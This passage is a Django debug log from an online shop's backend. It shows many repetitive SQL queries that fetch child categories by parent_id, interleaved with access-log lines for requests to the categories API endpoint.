(0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 10:00:34,642 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 10:00:34,645 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 10:00:34,647 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 10:00:34,649 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 10:00:34,651 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 10:00:34,654 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 10:00:34,656 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 10:00:34,659 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 10:00:34,661 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 10:00:34,664 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 10:00:34] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [20/Dec/2019 10:05:03] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-20 10:08:20,432 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 10:08:20,439 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 10:08:20,442 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 10:08:20,445 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 10:08:20,448 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 10:08:20,450 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 10:08:20,452 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 10:08:20,455 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 10:08:20,457 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 10:08:20,460 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 10:08:20,462 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 10:08:20,464 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 10:08:20,467 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 10:08:20,469 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 10:08:20,473 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 10:08:20,475 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 10:08:20,477 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 10:08:20,479 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 10:08:20,481 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 10:08:20,485 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 10:08:20,488 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 10:08:20,491 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 10:08:20,493 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 10:08:20,495 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 10:08:20,497 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 10:08:20,501 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 10:08:20,503 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 10:08:20,506 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 10:08:20,509 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 10:08:20,511 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 10:08:20,515 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 10:08:20,517 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 10:08:20,519 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 10:08:20,521 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 10:08:20,523 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 10:08:20,527 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 10:08:20,529 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 10:08:20,531 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 10:08:20,533 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 10:08:20,535 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 10:08:20,538 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 10:08:20,540 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 10:08:20,543 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 10:08:20,545 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 10:08:20,547 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 10:08:20,550 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 10:08:20] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 10:09:56,165 utils 4252 140031503103744 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 10:09:56,178 utils 4252 140031503103744 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 10:09:56,184 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 10:09:56,189 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 10:09:56,195 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 10:09:56,202 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 10:09:56,209 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 10:09:56,213 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 10:09:56,217 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 10:09:56,223 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 10:09:56,228 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", 